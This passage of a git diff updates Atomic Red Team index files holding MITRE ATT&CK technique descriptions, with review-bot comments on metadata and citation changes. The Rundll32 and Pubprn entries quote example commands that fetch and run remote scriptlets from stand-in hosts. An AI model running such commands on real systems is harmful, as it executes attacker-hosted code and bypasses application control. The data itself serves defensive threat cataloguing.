atomic_tests: []
T1011.001:
technique:
@@ -61155,7 +62043,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61177,8 +62065,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -61232,7 +62118,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -61257,7 +62142,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -61292,12 +62177,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61322,11 +62205,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
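Review bot: `x_mitre_network_requirements: false` is dropped here for T1020.001 and again for T1048 in a later hunk, alongside a version bump (1.2 to 1.3) with no visible description change. If upstream retired the field that is fine, but check that no index consumer filters on it before it disappears; and if the generator is instead dropping keys it does not recognize, that is the bug to fix rather than the data.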
@@ -61369,9 +62251,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -61418,7 +62299,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -61444,7 +62324,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61477,13 +62357,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -61532,12 +62410,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -61573,12 +62450,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -61587,7 +62463,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -61611,9 +62486,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -61636,7 +62510,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61658,8 +62532,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -61710,7 +62582,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -61760,7 +62631,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -61785,7 +62655,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -61808,13 +62678,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61855,9 +62723,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -61905,7 +62772,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -61927,7 +62793,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61951,12 +62817,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -62020,6 +62884,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/iaas_azure-index.yaml b/atomics/Indexes/iaas_azure-index.yaml
index b704d288e4..c9104f39cb 100644
--- a/atomics/Indexes/iaas_azure-index.yaml
+++ b/atomics/Indexes/iaas_azure-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
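Review bot: the T1027.011 description is emitted as a wrapped double-quoted scalar, so reflowing it makes unchanged sentences show up as removed and re-added (the Reflective Code Loading sentence at `- in-memory behaviors such as ...` / `+ behaviors such as ...`). T1205.002 directly above uses a literal block scalar (`description: |-`); using that form consistently would confine these diffs to the text that actually changed, which here is the new Linux shared-memory paragraph and the read-only file system sentence.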
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
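Review bot: the `description` added for `Aquasec Muhstik Malware 2024` begins with a space inside the quoted scalar (`" Nitzan Yaakov. (2024, June 4)...`), which is also why it is emitted double-quoted unlike the neighbouring entries. It is upstream data, so either strip leading whitespace in the generator or accept that this citation renders with a leading space.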
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
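Review bot: the new reference keys `Sysdig Fileless Malware 23022` and `Akami Frog4Shell 2024` look misspelled (presumably 2022 and Akamai), but they match the `(Citation: ...)` tokens used in the updated T1027.011 description in the earlier hunk, so they must not be corrected locally or the citations will dangle; report them upstream instead.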
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
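Review bot: the replacement URL for `This is Security Command Line Confusion` points at a different host and path (`www.stormshield.com/news/...`) while the description and retrieval date (March 5, 2018) are unchanged; confirm the new link resolves to the same Poweliks article rather than a landing page.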
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
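Review bot: everything removed here for T1556.003 (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`/`type`/`created`/`created_by_ref` and the whole `external_references` list) is re-added further down in the same object, so this hunk is key reordering rather than a content change. Emitting keys in a deterministic order in the generator would keep such diffs reviewable; the only real changes to this object are the `modified` date, the version bump, the dropped permissions field and the reordered references.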
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
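Review bot: `x_mitre_permissions_required: [root]` is removed from T1556.003 without replacement and nothing in the diff notes it; if any downstream tooling reads that field, flag the removal in the PR description. Also, the `external_references` order changes (`PAM Creds` now precedes `Red Hat PAM`), a further sign the generator writes entries in upstream order rather than a stable sort.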
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
